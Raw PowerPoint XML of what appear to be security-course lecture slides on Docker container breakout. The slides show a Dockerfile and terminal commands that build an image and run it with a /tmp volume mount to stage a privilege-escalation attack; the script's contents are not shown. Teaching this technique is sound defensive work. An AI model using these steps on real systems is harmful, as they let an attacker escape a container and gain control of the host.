        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1BC1DC3-7671-4218-FA79-DC16C0493497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7174" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD47159-D919-CFE9-7A16-8FFC753A1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5625"/>
            <a:ext cx="79248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22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4A88-ADC1-AB67-504E-BF8BDD0C01EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6786009-07B5-72F2-2F27-88621D763AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SA">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1BC1DC3-7671-4218-FA79-DC16C0493497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF96EDD2-44FF-272B-6535-7E7AA7B14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586" y="1870075"/>
            <a:ext cx="5725510" cy="395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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351989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r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Prepare for the privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2978FD4D-B63B-D28A-45A2-56E7D15E7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09850"/>
            <a:ext cx="79248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3F94B60-D7E6-090F-0A75-07B81D63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870004"/>
            <a:ext cx="7924800" cy="90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8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r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Docker file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>alpine:latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>COPY shellscript.sh shellscript.sh </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>COPY shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" err="1"/>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3154591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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Launch the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8C769F-6EEF-9EB4-0698-473830B45755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1388318307"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="3034432"/>
          <a:ext cx="10515600" cy="462280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10515600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3664388155"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>kali㉿kali</a:t>
                      </a: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a:solidFill>
                            <a:srgbClr val="C6B4F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/Desktop/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>INSE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="D36363"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>6130</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/privilege escalation] </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="333333"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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a:solidFill>
                            <a:srgbClr val="ADE5FC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>$ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>docker build --rm -t </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>privilege_escalation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> .</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="333333"/>
                        </a:highligh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3799268385"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35756C87-F27B-2A25-DA76-926CBD40E178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3162862134"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="4110122"/>
          <a:ext cx="10515600" cy="546286"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10515600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4190810784"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="546286">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>kali㉿kali</a:t>
                      </a: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a:solidFill>
                            <a:srgbClr val="C6B4F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/Desktop/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>INSE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="D36363"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>6130</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/privilege escalation] </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="333333"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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a:solidFill>
                            <a:srgbClr val="ADE5FC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>$ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>docker run -v /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>tmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="D36363"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>:/shared/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="D36363"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>privilege_escalation:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>latest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> /bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>sh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="333333"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>shellscript.sh</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="333333"/>
                        </a:highligh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3176511983"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62525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algn="l"/>
            <a:endParaRPr lang="en-US"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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57617635-E165-1F20-C043-E568B2021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90800"/>
            <a:ext cx="79248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251FED10-4BA1-D50C-1242-FEE0CF6A6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646244"/>
            <a:ext cx="79248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97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indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AE681E5-46AD-B543-F150-B203C3EA1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3132"/>
            <a:ext cx="79248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05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Privilege escalation using Volume Mount</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indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19458" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E23AE-882D-3BB0-771C-D89A615C6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95815"/>
            <a:ext cx="79248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102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a:xfrm>
            <a:off x="838200" y="197037"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Outline</a:t>
            </a:r>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838200" y="1248352"/>
            <a:ext cx="10515600" cy="4855602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400"/>
              <a:t>Container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Breakout</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2000"/>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
